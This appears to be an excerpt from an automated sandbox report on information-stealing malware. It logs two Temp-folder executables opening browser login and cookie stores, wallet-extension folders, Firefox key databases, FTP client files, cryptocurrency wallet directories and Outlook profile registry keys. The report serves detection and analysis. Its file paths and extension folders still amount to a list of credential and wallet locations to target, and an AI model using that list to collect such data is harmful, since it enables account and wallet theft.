Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
